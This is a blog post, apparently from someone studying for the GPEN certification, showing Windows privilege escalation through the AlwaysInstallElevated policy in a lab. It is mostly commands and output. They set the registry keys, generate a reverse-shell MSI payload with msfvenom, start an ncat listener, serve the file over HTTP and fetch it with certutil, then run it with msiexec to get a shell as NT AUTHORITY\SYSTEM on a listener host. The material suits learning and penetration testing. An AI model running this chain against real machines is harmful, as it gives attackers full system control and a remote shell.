Leveraging the AlwaysInstallElevated policy, allows an administrator to install a Windows installer package with system level privileges.
This is not recommended for use by Microsoft today. However, it is something I'm learning more about as I pursue my GPEN.
To be able to leverage this facility, two registry keys need to be set. These are:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Checking to the see if it is set on HKLM.
C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated End of search: 0 match(es) found.
Nothing found under HKLM, checking HKCU.
C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated End of search: 0 match(es) found.
Nothing found. Now I'm going to add the values, so that I can test the vulnerability.
C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD The operation completed successfully. C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD The operation completed successfully.
Verifying the entries have been created.
C:\>reg query HKlM\Software\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1
With the two entries in place, time to create an executable via MSFVenom.
┌──(rootđź’€securitynik)-[~/Downloads] └─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest No encoder specified, outputting raw payload Payload size: 460 bytes Final size of msi file: 159744 bytes Saved as: malicious.msi
Setup a listener on port 9999.
┌──(rootđź’€securitynik)-[~/Downloads] └─# ncat --verbose --listen 9999 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999
Setup a web server to host the malicious file.
┌──(rootđź’€securitynik)-[~/Downloads] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Before downloading the file and since this is about privilege escalation, time to verify the privileges this user has.
C:\tmp>whoami sec560student\sec560 C:\tmp>whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ============================================================= ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Downloading the file, using Certutil.
C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi **** Online **** CertUtil: -URLCache command completed successfully.
Confirming the file was downloaded.
┌──(rootđź’€securitynik)-[~/Downloads] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -
Running the msiexec command.
C:\tmp>msiexec /quiet /qn /i malicious.msi
At this point, looking at the last command, it looks like nothing happened. Looking back at my ncat session, we see.
┌──(rootđź’€securitynik)-[~/Downloads] └─# ncat --verbose --listen 9999 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.0.0.110. Ncat: Connection from 10.0.0.110:2283. Microsoft Windows [Version 10.0.18363.1440] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32> C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>whoami /groups whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ====================================== ================ ============================================================== ================================================== Mandatory Label\System Mandatory Level Label S-1-16-16384 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT SERVICE\msiserver Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
That's it for this post!
References:
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
https://steflan-security.com/windows-privilege-escalation-alwaysinstallelevated-policy/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
No comments:
Post a Comment